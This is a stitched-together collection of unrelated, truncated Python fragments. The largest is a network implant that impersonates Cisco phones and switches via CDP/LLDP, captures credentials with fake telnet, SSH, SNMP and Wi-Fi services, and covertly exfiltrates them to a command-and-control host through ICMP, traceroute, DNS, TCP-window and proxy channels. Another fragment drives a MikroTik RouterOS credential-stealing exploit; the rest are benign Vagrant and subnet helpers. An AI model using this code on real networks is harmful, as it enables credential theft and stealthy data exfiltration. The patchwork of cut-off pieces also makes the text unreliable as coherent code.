print('CDPd stoped (60sec) - phone (verbose 10sec)')
else:
time.sleep(60)
cdpdh.join()
# Fake LLDP for phone
lldpdh = LLDPHandler(iface, phonemac, ip,
'SEP' + phonemac.replace(':', ''), 'Port 1', False)
lldpdh.daemon = True
lldpdh.start()
# Stop calling .join() after X seconds (default 60sec)
if DEBUG:
print('LLDP started - phone')
time.sleep(10)
print('LLDPd stoped (60sec) - phone (verbose 10sec)')
else:
time.sleep(60)
lldpdh.join()
if EPRX:
prxlist = []
if DEBUG:
print('Proxy Discovery started')
# Discover WPAD via DHCP Inform (Option 252) if not already via initial DHCP Reply
if not wpad:
dhinform = DHCPInformHandler(iface, xid)
dhinform.daemon = True
dhinform.start()
dhcpinform = (Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") /
IP(src=ip, dst="255.255.255.255") /
UDP(sport=68, dport=67) /
BOOTP(chaddr=chaddr, ciaddr=ip, xid=xid) /
DHCP(options=[('message-type', 'inform'),
('param_req_list', 252), 'end']))
sendp(dhcpinform, iface=iface, verbose=0)
time.sleep(10)
wpad = dhinform.join()
# No option 252, look for WPAD DNS entry
if not wpad:
if DEBUG:
print('Looking for wpad.<domain> entry')
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = [dns_srv]
resolver.timeout = 1
resolver.lifetime = 1
try:
answer = resolver.query('wpad.' + domain, 'A')
except:
answer = None
pass
if answer:
if DEBUG:
print('Found WPAD DNS')
print(answer[0])
prxlist = getpac(str(answer[0]), 'PAD')
else:
if DEBUG:
print('Found DHCP option 252: {}'.format(wpad))
prxlist = getpac(wpad, True)
if not prxlist:
# Build a list for DNS lookups (~280)
if DEBUG:
print('Guessing DNS entry for PAC server')
# Combine below keywords together, _ and -
tryname = [
'proxy', 'pac', 'wpad', 'pad', 'internet', 'inet', 'gw',
'gateway', 'prx', 'web'
]
master_list = []
for x in range(len(tryname)):
master_list.append(tryname[x])
for z in range(len(tryname)):
if not tryname[x] == tryname[z]:
master_list.append(tryname[x] + tryname[z])
master_list.append(tryname[x] + '-' + tryname[z])
master_list.append(tryname[x] + '_' + tryname[z])
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = [dns_srv]
resolver.timeout = 1
resolver.lifetime = 1
for prx in range(len(master_list)):
try:
answer = resolver.query(master_list[prx] + '.' + domain,
'A')
except:
answer = False
pass
if answer:
if DEBUG:
print('Found DNS, looking for PAC files')
for rr in range(len(answer)):
if DEBUG:
print(master_list[prx] + '.' + domain + '=' +
answer[rr])
prxlist = getpac(str(answer[rr]), False)
if prxlist:
break
if DEBUG:
print('Proxy Discovery ended')
# Wait 300sec or more to clear MAC (180sec to clear CDP)
if DEBUG:
time.sleep(10)
print('Wait 300sec for MAC & CDP cache to clear (verbose 10sec)')
else:
time.sleep(300)
# Change MAC to became a Cisco Switch
if DEBUG:
print('MAC change started - switch')
changemac(iface, switchmac)
if DEBUG:
print('MAC change ended - switch')
# Search CDP packets from discover()
find = re.compile('[<CDPNAME>|<LLDPNAME>],(.*)')
with open(clifd, 'r') as sfile:
swname = find.findall(sfile.read())
if swname:
fakeswname = newname(swname[0])
else:
# make up a name if can't derive
fakeswname = 'sw-test01'
if DEBUG:
print('Hostname setup - switch')
# Start fake CDP as 'switch'
cdppkt = rdpcap(swcdptpl, 1)
cdpdh = CDPHandler(iface, cdppkt, switchmac, ip, fakeswname, switchport)
cdpdh.daemon = True
cdpdh.start()
if DEBUG:
print('CDPd started - switch')
# Start fake LLDP as 'switch'
lldpdh = LLDPHandler(iface, switchmac, ip, fakeswname, switchport, True)
lldpdh.daemon = True
lldpdh.start()
if DEBUG:
print('LLDP started - phone')
# Create SNMP config for snmposter daemon
ipnet = str(ipcalc.Network(ip + '/' + netmask).network())
snmpconf(fakeswname, ip, netmask, ipnet, mac, gwip, gwmac)
if DEBUG:
print('SNMP config created')
# Start snmposter daemon
kill_process('snmposter')
subprocess.call("/usr/local/bin/snmposter -f " + agent + " 2>/dev/null",
shell=True)
snmpdh = SNMPHandler(iface, mastercred)
snmpdh.daemon = True
snmpdh.start()
if DEBUG:
print('SNMP catcher started')
# Create config file for telnet & ssh fake daemons
with open(clifd, 'a') as cli:
cli.write('<NAME>,' + fakeswname + '\n')
cli.write('<IP>,' + ip + '\n')
cli.write('<MASK>,' + netmask + '\n')
cli.write('<MASKCIDR>,' +
str(sum([bin(int(x)).count("1")
for x in netmask.split(".")])) + '\n')
swcmac = switchmac.replace(':', '')
swmaccisco = swcmac[0:4].lower() + '.' + swcmac[4:8].lower()\
+ '.' + swcmac[8:12].lower()
cli.write('<MAC>,' + swmaccisco + '\n')
cli.write('<INT>,' + switchport + '\n')
cli.write('<NETIP>,' + ipnet + '\n')
cli.write('<GWIP>,' + gwip + '\n')
macraw = gwmac.replace(':', '')
gwmaccisco = macraw[0:4] + '.' + macraw[4:8] + '.' + macraw[8:12]
cli.write('<GWMAC>,' + gwmaccisco + '\n')
cli.write('<SERIAL>,' + serial + '\n')
cli.write('<SNPSU>,' + snpsu + '\n')
# Future use in Circo v2
cli.write('<SNMPC>,' + snmpcommunity + '\n')
if DEBUG:
print('CLI config created')
# Kill telnet/ssh process if running and start them
kill_process('telnetd-fake')
if DEBUG:
print('TELNET catcher started')
telned = dirname + 'telnetd-fake.py'
subprocess.call(telned + ' ' + mastercred + ' &', shell=True)
if DEBUG:
print('SSH catcher started')
kill_process('sshd-fake')
sshd = dirname + 'sshd-fake.py'
subprocess.call(sshd + ' ' + mastercred + ' &', shell=True)
# If Fake-AP exfiltration enable put wireless interface into monitor
# Channel 10 (adjust as necessary to match jaula_v1.py)
if EAP:
if DEBUG:
print('WIFI monitor started')
subprocess.call('/sbin/ifconfig ' + wiface + ' down', shell=True)
subprocess.call('/usr/sbin/airmon-ng start ' + wiface +
' 10 >/dev/null',
shell=True)
wiface = wiface + 'mon'
subprocess.call('/sbin/ifconfig ' + wiface + ' up', shell=True)
# Start Fake AP
aphd = APHandler(wiface, mastercred, 5)
aphd.daemon = True
aphd.start()
if DEBUG:
print('AP started')
# Main Loop if credentials found
while True:
try:
if os.path.isfile(mastercred):
with open(mastercred, 'r') as sfile:
for line in sfile:
# encrypt and split into 4 bytes
cry = encrypti(line.strip())
ar = [cry[i:i + 4] for i in range(0, len(cry), 4)]
if len(cry) % 4 != 0:
for x in range(4 - len(ar[len(ar) - 1])):
ar[len(ar) - 1] = ar[len(ar) - 1] + '0'
# ICMP exfiltration
# Use [IP].id 200+len of crypto (first pkt)
# Then [IP].id 300+amount of pkts (split by 16bits)
# Send the crypto split by 16bits and replace
# [ICMP].seq field
if EPING:
if DEBUG:
print('Sending credentials via ICMP')
# craft packet
pingpkt = (Ether(src=switchmac, dst=gwmac) /
IP(ihl=5, src=ip, dst=cchost) / ICMP() /
Raw(load='s\x88\xb7[\x7f\xc2\x05\x00'
'\x08\t\n\x0b\x0c\r\x0e\x0f'
'\x10\x11\x12\x13\x14\x15\x16'
'\x17\x18\x19\x1a\x1b\x1c\x1d'
'\x1e\x1f !"#$%&\'()*+,-./012'
'34567'))
# first pkt (crypto len)
pingpkt[IP].id = 200 + len(cry)
pingpkt[ICMP].seq = 1
pingpkt[ICMP].id = random.randint(0, 0xFFFF)
pingpkt = pingpkt.__class__(str(pingpkt))
sendp(pingpkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# second pkt (amount of pkts)
del pingpkt[IP].chksum
del pingpkt[ICMP].chksum
pingpkt[IP].id = 300 + len(ar)
pingpkt[ICMP].seq = 2
pingpkt[ICMP].id = pingpkt[ICMP].id + 1
pingpkt = pingpkt.__class__(str(pingpkt))
sendp(pingpkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# paylod pkts
for x in range(len(ar)):
del pingpkt[IP].chksum
del pingpkt[ICMP].chksum
pingpkt[IP].id = 500 + x
pingpkt[ICMP].seq = int(ar[x], 16)
pingpkt[ICMP].id = pingpkt[ICMP].id + 1
pingpkt = pingpkt.__class__(str(pingpkt))
sendp(pingpkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# Traceroute exfiltration
# Use [IP].id 200+len and [IP].id 300+amount of pkts
# To encapsulate crypto, split by 16bits and attach
# last 4 bytes of traceroute[UDP] Raw (@ABC.....)
if ETRACE:
if DEBUG:
print('Sending credentials via Traceroute')
# craft packet
trcpkt = (Ether(src=switchmac, dst=gwmac) /
IP(ihl=5, src=ip, dst=cchost) /
UDP(sport=53200, dport=33434) /
Raw(load='@ABCDEFGHIJKLMNOP'
'QRSTUVWXYZ[abcd'))
# first pkt (crypto len)
trcpkt[IP].ttl = 32
trcpkt[IP].id = 200 + len(cry)
trcpkt = trcpkt.__class__(str(trcpkt))
sendp(trcpkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# second pkt (amount of pkts)
trcpkt[IP].id = 300 + len(ar)
del trcpkt[IP].chksum
del trcpkt[UDP].chksum
trcpkt = trcpkt.__class__(str(trcpkt))
sendp(trcpkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# payload pkts
for x in range(len(ar)):
del trcpkt[IP].chksum
del trcpkt[UDP].chksum
trcpkt[IP].id = 500 + x
trcpkt[IP].ttl = 32 - x
trcpkt[UDP].dport = trcpkt[UDP].dport + x // 3
trcpkt[Raw].load = '@ABCDEFGHIJKLMNO'\
'PQRSTUVWXYZ[' + ar[x]
trcpkt = trcpkt.__class__(str(trcpkt))
sendp(trcpkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# DNS exfiltration
# Within a DNS NS pkt, we set the crypto (all of it)
# as subdomain <crypto>.ccname
if EDNS:
if DEBUG:
print('Sending credentials via DNS')
# craft packet
dnspkt = (Ether(src=switchmac, dst=gwmac) /
IP(ihl=5, src=ip, dst=dns_srv) /
UDP(sport=53, dport=53) /
DNS(rd=1,
qd=DNSQR(qname=cry + '.' + ccname,
qtype='NS')))
# one pkt (crypto)
dnspkt[IP].id = random.randint(0, 0xFFFF)
dnspkt[DNS].id = random.randint(0, 0xFFFF)
dnspkt = dnspkt.__class__(str(dnspkt))
sendp(dnspkt, iface=iface, verbose=0)
# HTTP exfiltration
# We don't neeed a fully TCP/3WAY, just a few SYN
# packets. As before, [IP].id used for crypto len &
# amount of pkt. The crypto payload split / 4
# (16bits each) hidden on [TCP].window field
if EWEB:
if DEBUG:
print('Sending credentials via HTTP')
# craft packet
httppkt = (
Ether(src=switchmac, dst=gwmac) /
IP(ihl=5, flags='DF', src=ip, dst=cchost) /
TCP(sport=random.randint(3025, 38000),
dport=80,
ack=0,
dataofs=10,
reserved=0,
flags='S',
urgptr=0))
httppkt[TCP].options = [
('MSS', 1460), ('SAckOK', ''),
('Timestamp', (int(time.time()), 0)),
('NOP', None), ('WScale', 6)
]
httppkt[TCP].seq = random.randint(
1000000000, 1800000000)
httppkt[TCP].window = random.randint(30000, 40000)
# first pkt (crypto len)
httppkt[IP].id = 200 + len(cry)
httppkt = httppkt.__class__(str(httppkt))
sendp(httppkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# second pkt (amount of pkts)
del httppkt[IP].chksum
del httppkt[TCP].chksum
httppkt[IP].id = 300 + len(ar)
httppkt = httppkt.__class__(str(httppkt))
sendp(httppkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# payload pkts
for x in range(len(ar)):
del httppkt[IP].chksum
del httppkt[TCP].chksum
httppkt[IP].id = 500 + x
httppkt[TCP].window = int(ar[x], 16)
httppkt = httppkt.__class__(str(httppkt))
sendp(httppkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# HTTPS/SSL exfiltration
# We don't neeed a fully TCP/3WAY, just a few SYN
# packets. As before, [IP].id used for crypto len &
# amount of pkt. The crypto payload split / 4
# (16bits each) hidden on [TCP].window field
if ESSL:
if DEBUG:
print('Sending credentials via HTTPS')
# craft packet
httpspkt = (
Ether(src=switchmac, dst=gwmac) /
IP(ihl=5, flags='DF', src=ip, dst=cchost) /
TCP(sport=random.randint(3025, 38000),
dport=443,
ack=0,
dataofs=10,
reserved=0,
flags='S',
urgptr=0))
httpspkt[TCP].options = [('MSS', 1460),
('SAckOK', ''),
('Timestamp',
(int(time.time()), 0)),
('NOP', None),
('WScale', 6)]
httpspkt[TCP].seq = random.randint(
1000000000, 1800000000)
httpspkt[TCP].window = random.randint(30000, 40000)
# first pkt (crypto len)
httpspkt[IP].id = 200 + len(cry)
httpspkt = httpspkt.__class__(str(httpspkt))
sendp(httpspkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# second pkt (amount of pkts)
del httpspkt[IP].chksum
del httpspkt[TCP].chksum
httpspkt[IP].id = 300 + len(ar)
httpspkt = httpspkt.__class__(str(httpspkt))
sendp(httpspkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# payload pkts
for x in range(len(ar)):
del httpspkt[IP].chksum
del httpspkt[TCP].chksum
httpspkt[IP].id = 500 + x
httpspkt[TCP].window = int(ar[x], 16)
httpspkt = httpspkt.__class__(str(httpspkt))
sendp(httpspkt, iface=iface, verbose=0)
# random delay
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
if EPRX:
if prxlist:
if DEBUG:
print('Sending credentials via Proxy: ' +
' '.join(prxlist))
# setup proxy and send HTTPS (DNS crypto)
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv11.0) like Gecko',
'Accept-Enconding':
', '.join(('gzip', 'deflate')),
'Accept':
'*/*',
'Connection':
'keep-alive'
}
fakeurl = 'http://' + cry + '.' + ccname
for prx in range(len(prxlist)):
http_proxy = 'http://' + prxlist[prx]
proxyDict = {
'http': http_proxy,
'https': http_proxy
}
try:
r = requests.get(fakeurl,
headers=headers,
proxies=proxyDict)
except requests.exceptions.RequestException:
pass
if not DEBUG:
time.sleep(random.randint(1, 30))
else:
time.sleep(1)
# Define interval between exfiltration (per line of cred file)
if DEBUG:
print('Credentials by line 300sec interval (20s verbose)')
time.sleep(20)
else:
time.sleep(300)
# Capture ctrl+c for clean exit
except KeyboardInterrupt:
kill_process('sshd-fake')
kill_process('telnetd-fake')
kill_process('snmposter')
cdpdh.join()
lldpdh.join()
try:
aphd.join()
except NameError:
pass
sys.exit(0)
with open(ipFile) as f:
ipList = f.readlines()
except Exception, e:
print e
print 'Couldn\'t open ' + ipFile
sys.exit()
for target in ipList:
if target.find(
'/'
) == -1: #Single IP or DNS name, no IP calculator to break out targets
httpHandler(target.rstrip())
else: #Subnet specified, break out IPs
for address in ipcalc.Network(target.rstrip()):
httpHandler(address)
def httpHandler(scanTarget):
try:
request = urllib2.Request('http://' + str(scanTarget))
request.add_header(
'User-Agent', 'Mozilla/5.0 (Windows NT 6.1)'
) #Add a fake user agent in case the app/LB wants it
request.add_header('Connection', 'close') #More fake stuff
response = urllib2.urlopen(request, timeout=3)
except urllib2.HTTPError, e:
if 'WWW-authenticate' in e.hdrs:
print 'Found basic authentication on ' + str(scanTarget) + '!'
def main():
description = """
Mikrotik exploit from Vault 7 CIA Leaks automation tool
Takeovers up to RouterOS 6.38.4.
Usage: mikrot8over IP_ADDRESS
"""
if six.PY2:
parser = argparse.ArgumentParser(description)
addArgumentCall = parser.add_argument
else:
parser = argparse(description)
addArgumentCall = parser.add_option
#
if six.PY2:
addArgumentCall('address', metavar='address', type=str, nargs=1,
help='Scan address or IPv4 network in CIDR format')
# Arguments
addArgumentCall('-p', '--port', type=int, nargs="*", default=8291,
help='List of the port to scan. Default is 8291')
addArgumentCall('-t', '--threads', nargs=1, type=int, default=10,
help='Number of scan threads. Default is 10 that fits the most of systems')
addArgumentCall('-o', '--timeout', nargs=1, type=float, default=0.3,
help='Socket connection timeout')
if six.PY2:
options = parser.parse_args()
address = " ".join(options.address)
else:
options, args = parser.parse_args()
address = " ".join(args)
port = options.port
threads = options.threads
timeout = options.timeout
if not address:
print(description)
print("No scan address provided. Exit.")
exit()
print("Starting scan for IP %s, port %s running in %s threads" % (address, port, threads))
try:
targets = ipcalc.Network(address)
scan_args = ((str(ip), port, timeout) for ip in targets)
except ValueError as error:
print("Failed to parse network address %s with %s error" % (address, error))
exit()
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
results = list(tqdm(executor.map(lambda p: scan_target(*p), scan_args), total=len(targets)))
output_table = texttable.Texttable()
output_table.set_cols_dtype(['t', 't', 't'])
output_table.set_cols_align(['c', 'l', 'c'])
output_table.set_cols_width(['20', '30', '100'])
table_rows = [['IP', 'Login', 'Password']]
vulnerable_results = [result for result in results if result and result['users']]
for data in vulnerable_results:
for credentials in data['users']:
if credentials[1]:
table_rows.append([data["ip_address"], credentials[0], credentials[1]])
output_table.add_rows(table_rows)
if not six.PY3:
# Just pass non-ascii
print(output_table.draw().encode('ascii', 'ignore'))
else:
# Any better solution here?
print(output_table.draw().encode('ascii', 'ignore').decode())
def writeRouter(f, Router, edges):
Id = Router["id"]
Name = Router["label"]
Os = Router["vm_image"]
Ram = Router["ram"]
N_Cpus = Router["n_cpus"]
Ip1 = Router["network_interfaces"][0]["ip_address"]
Netmask1 = Router["network_interfaces"][0]["netmask"]
Interface1 = Router["network_interfaces"][0]["name_interface"]
EdgeReference1 = Router["network_interfaces"][0]["edge"]
UplinkBandwidth1 = 0
DownlinkBandwidth1 = 0
for edge in edges:
if EdgeReference1[0] == edge["from"] and EdgeReference1[1] == edge[
"to"]:
UplinkBandwidth1 = edge["bandwidth_up"]
DownlinkBandwidth1 = edge["bandwidth_down"]
IpNoSub1 = Ip1.split("/")[0]
NetmaskAbbr1 = Ip1.split("/")[1]
Ip2 = Router["network_interfaces"][1]["ip_address"]
Netmask2 = Router["network_interfaces"][1]["netmask"]
Interface2 = Router["network_interfaces"][1]["name_interface"]
EdgeReference2 = Router["network_interfaces"][1]["edge"]
UplinkBandwidth2 = 0
DownlinkBandwidth2 = 0
for edge in edges:
if EdgeReference2[0] == edge["from"] and EdgeReference2[1] == edge[
"to"]:
UplinkBandwidth2 = edge["bandwidth_up"]
DownlinkBandwidth2 = edge["bandwidth_down"]
IpNoSub2 = Ip2.split("/")[0]
NetmaskAbbr2 = Ip2.split("/")[1]
Ip3 = Router["network_interfaces"][2]["ip_address"]
Netmask3 = Router["network_interfaces"][2]["netmask"]
Interface3 = Router["network_interfaces"][2]["name_interface"]
EdgeReference3 = Router["network_interfaces"][2]["edge"]
UplinkBandwidth3 = 0
DownlinkBandwidth3 = 0
for edge in edges:
if EdgeReference3[0] == edge["from"] and EdgeReference3[1] == edge[
"to"]:
UplinkBandwidth3 = edge["bandwidth_up"]
DownlinkBandwidth3 = edge["bandwidth_down"]
IpNoSub3 = Ip3.split("/")[0]
NetmaskAbbr3 = Ip3.split("/")[1]
Network1 = ipcalc.Network(Ip1)
IpNet1 = Network1.network()
for x in Network1:
Gateway1 = str(x)
Network2 = ipcalc.Network(Ip2)
IpNet2 = Network2.network()
for x in Network2:
Gateway2 = str(x)
Network3 = ipcalc.Network(Ip3)
IpNet3 = Network3.network()
for x in Network3:
Gateway3 = str(x)
CustomScript = Router["custom_script"]
f.write("config.vm.define \"" + Name + "\" do |" + Name + "|\n")
f.write(Name + ".vm.box = \"" + Os + "\"\n")
f.write(Name + ".vm.hostname = \"" + Name + "\"\n")
if Id == 1:
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-1\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-3\", auto_config: false\n"
)
if Id == 2:
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-2\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-1\", auto_config: false\n"
)
if Id == 3:
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-3\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-inter-2\", auto_config: false\n"
)
f.write(
Name +
'.vm.provision "file", source: \"../Dashboard_Server/telegraf.conf\", destination: \"/tmp/telegraf.conf\"\n'
)
f.write(Name + ".vm.provision \"shell\", inline: <<-SHELL\n")
f.write("echo \" Quagga " + Name + " start installing\"\n")
f.write("#sudo sysctl -w net.ipv4.ip_forward=1\n")
f.write("sudo apt-get update\n")
f.write("sudo apt-get install quagga quagga-doc traceroute\n")
f.write(
"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\n"
)
f.write(
"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\n"
)
f.write("sudo chown quagga.quaggavty /etc/quagga/*.conf\n")
f.write("sudo /etc/init.d/quagga start\n")
f.write("sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\n")
f.write("sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\n")
f.write("sudo echo 'VTYSH_PAGER=more' >>/etc/environment\n")
f.write("sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\n")
f.write("sudo /etc/init.d/quagga restart\n")
f.write("echo \"Routing Protocol ospf Configuration Started\"\n")
f.write("sudo vtysh -c '\n")
f.write("configure terminal\n")
f.write("router ospf\n")
f.write("network " + str(IpNet1) + "/" + NetmaskAbbr1 + " area 0.0.0.0\n")
f.write("network " + str(IpNet2) + "/" + NetmaskAbbr2 + " area 0.0.0.0\n")
f.write("network " + str(IpNet3) + "/" + NetmaskAbbr3 + " area 0.0.0.0\n")
f.write("exit\n")
f.write("interface " + Interface1 + "\n")
f.write("ip address " + IpNoSub1 + "/" + NetmaskAbbr1 + "\n")
f.write("exit\n")
f.write("interface " + Interface2 + "\n")
f.write("ip address " + IpNoSub2 + "/" + NetmaskAbbr2 + "\n")
f.write("exit\n")
f.write("interface " + Interface3 + "\n")
f.write("ip address " + IpNoSub3 + "/" + NetmaskAbbr3 + "\n")
f.write("do write\n")
f.write("exit\n")
f.write("exit\n")
f.write("ip forwarding\n")
f.write("exit'\n")
f.write('cd /home/vagrant\n')
f.write('git clone https://github.com/magnific0/wondershaper.git\n')
f.write('cd wondershaper\n')
if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:
f.write('sudo ./wondershaper -a ' + Interface1)
if DownlinkBandwidth1 > 0:
f.write(' -d ' + str(DownlinkBandwidth1))
if UplinkBandwidth1 > 0:
f.write(' -u ' + str(UplinkBandwidth1))
f.write('\n')
if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:
f.write('sudo ./wondershaper -a ' + Interface2)
if DownlinkBandwidth2 > 0:
f.write(' -d ' + str(DownlinkBandwidth2))
if UplinkBandwidth2 > 0:
f.write(' -u ' + str(UplinkBandwidth2))
f.write('\n')
if UplinkBandwidth3 > 0 or DownlinkBandwidth3 > 0:
f.write('sudo ./wondershaper -a ' + Interface3)
if DownlinkBandwidth3 > 0:
f.write(' -d ' + str(DownlinkBandwidth3))
if UplinkBandwidth3 > 0:
f.write(' -u ' + str(UplinkBandwidth3))
f.write('\n')
f.write(
'wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\n'
)
f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\n')
f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\n')
f.write('sudo systemctl restart telegraf\n')
f.write('sudo systemctl enable telegraf\n')
f.write(CustomScript + " \n") #here there is the custum script
f.write("echo \"Configuration END\"\n")
f.write("echo \"" + Name + " is ready to Use\"\n")
f.write("SHELL\n")
f.write("# " + Name + ".vm.provision \"shell\", path: \"common.sh\"\n")
f.write(Name + ".vm.provider \"virtualbox\" do |vb|\n")
f.write("vb.memory = " + str(Ram) + "\n")
f.write("vb.cpus = " + str(N_Cpus) + "\n")
f.write("end\n")
f.write("end\n")
str(netdatalist[netdatalistlen - 1])
]
ws = wb['General']
data = {}
envfound = 0
envname = ''
for cnt, row in enumerate(generalSheet[generalSheetStart:generalSheetStop +
str(generalSheet.max_row)]):
if envfound == 0 and row[0].value is not None and row[0].value != 0:
debugprint(data)
envfound = 1
envname = row[0].value
cidr = row[2].value + row[3].value
subnet = ipcalc.Network(cidr).network()
route_asn = row[6].value
route_target = row[7].value
gw = gateway(cidr)
range = iprange(cidr)
data = {
envname: [{
'cidr': cidr,
'name': row[1].value,
'route_asn': row[6].value,
'route_target': row[7].value,
'subnet': str(subnet),
'subnet_prefix': int(row[3].value.replace('/', '')),
'gateway': gw,
'allocation_start': range[0],
'allocation_end': range[1]
def isitin(net, key):
result = ipcalc.Network(net).has_key(key)
if result == True:
logger.info("True: " + key + " is in the " + net + " Subnet!")
else:
logger.info(Fore.RED + "FALSE: " + key + " is not in the " + net + " Subnet!")
def writeRouter(f, Router, edges):
# print("adding a router to the vagrant file")
#extrapolate each attribute from the touples
Id = Router["id"]
Name = Router["label"]
Os = Router["vm_image"]
Ram = Router["ram"]
N_Cpus = Router["n_cpus"]
Ip1 = Router["network_interfaces"][0]["ip_address"]
Netmask1 = Router["network_interfaces"][0]["netmask"]
Interface1 = Router["network_interfaces"][0]["name_interface"]
EdgeReference1 = Router["network_interfaces"][0]["edge"]
UplinkBandwidth1 = 0
DownlinkBandwidth1 = 0
for edge in edges:
if EdgeReference1[0] == edge["from"] and EdgeReference1[1] == edge["to"]:
UplinkBandwidth1 = edge["bandwidth_up"]
DownlinkBandwidth1 = edge["bandwidth_down"]
IpNoSub1 = Ip1.split("/")[0]
NetmaskAbbr1 = Ip1.split("/")[1]
Ip2 = Router["network_interfaces"][1]["ip_address"]
Netmask2 = Router["network_interfaces"][1]["netmask"]
Interface2 = Router["network_interfaces"][1]["name_interface"]
EdgeReference2 = Router["network_interfaces"][1]["edge"]
UplinkBandwidth2 = 0
DownlinkBandwidth2 = 0
for edge in edges:
if EdgeReference2[0] == edge["from"] and EdgeReference2[1] == edge["to"]:
UplinkBandwidth2 = edge["bandwidth_up"]
DownlinkBandwidth2 = edge["bandwidth_down"]
IpNoSub2 = Ip2.split("/")[0]
NetmaskAbbr2 = Ip2.split("/")[1]
Ip3 = Router["network_interfaces"][2]["ip_address"]
Netmask3 = Router["network_interfaces"][2]["netmask"]
Interface3 = Router["network_interfaces"][2]["name_interface"]
EdgeReference3 = Router["network_interfaces"][2]["edge"]
UplinkBandwidth3 = 0
DownlinkBandwidth3 = 0
for edge in edges:
if EdgeReference3[0] == edge["from"] and EdgeReference3[1] == edge["to"]:
UplinkBandwidth3 = edge["bandwidth_up"]
DownlinkBandwidth3 = edge["bandwidth_down"]
IpNoSub3 = Ip3.split("/")[0]
NetmaskAbbr3 = Ip3.split("/")[1]
Network1 = ipcalc.Network(Ip1)
IpNet1 = Network1.network()
for x in Network1:
Gateway1 = str(x)
Network2 = ipcalc.Network(Ip2)
IpNet2 = Network2.network()
for x in Network2:
Gateway2 = str(x)
Network3 = ipcalc.Network(Ip3)
IpNet3 = Network3.network()
for x in Network3:
Gateway3 = str(x)
CustumScript = Router["custom_script"]
f.write("config.vm.define \""+ Name +"\" do |" + Name + "|\n")
f.write(Name + ".vm.box = \"" + Os + "\"\n")
f.write(Name + ".vm.hostname = \""+ Name +"\"\n")
f.write(Name + '.vm.network "private_network", ip: \"' + IpNoSub1 + '\", netmask: \"' + Netmask1 + '\", virtualbox__intnet: "broadcast_router-south-1", auto_config: true\n')
f.write(Name + '.vm.network "private_network", ip: \"' + IpNoSub2 + '\", netmask: \"' + Netmask2 + '\", virtualbox__intnet: "broadcast_router-south-2", auto_config: true\n')
f.write(Name + '.vm.network "private_network", ip: \"' + IpNoSub3 + '\", netmask: \"' + Netmask3 + '\", virtualbox__intnet: "broadcast_router-south-3", auto_config: true\n')
f.write(Name + ".vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n")
f.write("echo \" Quagga "+ Name +" start installing\"\n")
f.write("#sudo sysctl -w net.ipv4.ip_forward=1\n")
f.write("sudo apt-get update\n")
f.write("sudo apt-get install quagga quagga-doc traceroute\n")
f.write("sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\n")
f.write("sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\n")
f.write("sudo chown quagga.quaggavty /etc/quagga/*.conf\n")
f.write("sudo /etc/init.d/quagga start\n")
f.write("sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\n")
f.write("sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\n")
f.write("sudo echo 'VTYSH_PAGER=more' >>/etc/environment\n")
f.write("sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\n")
f.write("sudo /etc/init.d/quagga restart\n")
f.write("echo \"Routing Protocol ospf Configuration Started\"\n")
f.write("sudo vtysh -c '\n")
f.write("configure terminal\n")
f.write("router ospf\n")
